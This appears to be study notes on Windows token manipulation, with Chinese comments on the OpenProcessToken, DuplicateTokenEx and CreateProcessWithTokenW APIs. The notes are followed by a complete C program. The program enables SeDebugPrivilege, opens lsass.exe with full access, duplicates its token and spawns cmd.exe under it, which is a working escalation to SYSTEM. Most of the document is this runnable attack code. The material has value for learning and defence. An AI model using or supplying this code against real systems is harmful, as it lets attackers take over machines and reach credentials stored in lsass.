BOOL OpenProcessToken(
  HANDLE  ProcessHandle,				//进程句柄
  DWORD   DesiredAccess,				//要获取的Token的权限
  PHANDLE TokenHandle					//指向Token句柄的指针
);

BOOL DuplicateTokenEx(
  [in]           HANDLE                       hExistingToken,		//token句柄
  [in]           DWORD                        dwDesiredAccess,	  	//指定新令牌的请求访问权限，人话就是要不要把特权都复制过来
  [in, optional] LPSECURITY_ATTRIBUTES        lpTokenAttributes,	//安全描述符，NULL
  [in]           SECURITY_IMPERSONATION_LEVEL ImpersonationLevel,	//指定新令牌的模拟级别，一般用SecurityImpersonation，模拟级别的文章会放在后面
  [in]           TOKEN_TYPE                   TokenType,			//模拟令牌的类型，主令牌还是模拟令牌
  [out]          PHANDLE                      phNewToken			//指向接收新handle的指针
);

BOOL CreateProcessWithTokenW(
  [in]                HANDLE                hToken,				//创建进程用到的令牌
  [in]                DWORD                 dwLogonFlags,		//一个讲不清楚的标志位
  [in, optional]      LPCWSTR               lpApplicationName,	//要执行的模块的名称
  [in, out, optional] LPWSTR                lpCommandLine,		//命令行
  [in]                DWORD                 dwCreationFlags,	//进程标志位，就新进程属性这样的吧
  [in, optional]      LPVOID                lpEnvironment,		//指向新进程环境块的指针
  [in, optional]      LPCWSTR               lpCurrentDirectory, //进程当前目录的完整路径NULL就是与调用进程相同的路径
  [in]                LPSTARTUPINFOW        lpStartupInfo,		//指向STARTUPINFO或STARTUPINFOEX结构的指针，不太明白..应该是设置一些新进程的属性
  [out]               LPPROCESS_INFORMATION lpProcessInformation//新进程的一些信息，输出到PROCESS_INFORMATION结构
);

#include<windows.h>
#include<stdio.h>
#include<tlhelp32.h>

BOOL EnableSeDebugPrivilege() {
	HANDLE Token;
	LUID LuidValue = { 0 };
	TOKEN_PRIVILEGES TP = { 0 };
	BOOL Aret = OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &Token);
	if (Aret == NULL) {
		printf("GetTokenHandle Fail\n");
		return FALSE;
	}
	BOOL Bret = LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &LuidValue);
	if (Bret == NULL) {
		printf("LookupPrivilegeValue Fail\n");
		return FALSE;
	}
	TP.PrivilegeCount = 1;
	TP.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
	TP.Privileges[0].Luid = LuidValue;
	BOOL Cret = AdjustTokenPrivileges(Token, FALSE, &TP, 0, 0, 0);
	if (GetLastError() == ERROR_SUCCESS) {
		printf("AdjustToken Success\n");
		return TRUE;
	}
	printf("AdjustToken Fail\n");
	printf("ErrorCode: %d\n", GetLastError());
	return FALSE;
}


int FindProcessId(LPCTSTR ProcessName) {
	PROCESSENTRY32 PE = { 0 };
	PE.dwSize = sizeof(PE);
	HANDLE ProcessIDALL = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	if (Process32First(ProcessIDALL, &PE)) {
		do {
			if (lstrcmpi(ProcessName, PE.szExeFile) == 0) {
				return PE.th32ProcessID;
			}
		} while (Process32Next(ProcessIDALL, &PE));
	}

	return 0;
}

int main() {
	EnableSeDebugPrivilege();
	int pid = FindProcessId(L"lsass.exe");
	printf("pid: %d\n", pid);
	HANDLE process_token;
	HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
	HANDLE New_Token;
	STARTUPINFOW si = {};
	PROCESS_INFORMATION pi = {};
	OpenProcessToken(process,  TOKEN_DUPLICATE | TOKEN_QUERY, &process_token);
	DuplicateTokenEx(process_token, MAXIMUM_ALLOWED, NULL, SecurityImpersonation, TokenPrimary, &New_Token);
	BOOL ret = CreateProcessWithTokenW(New_Token, LOGON_NETCREDENTIALS_ONLY, L"C:\\windows\\system32\\cmd.exe", NULL, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);
	printf("%d\n", GetLastError());
}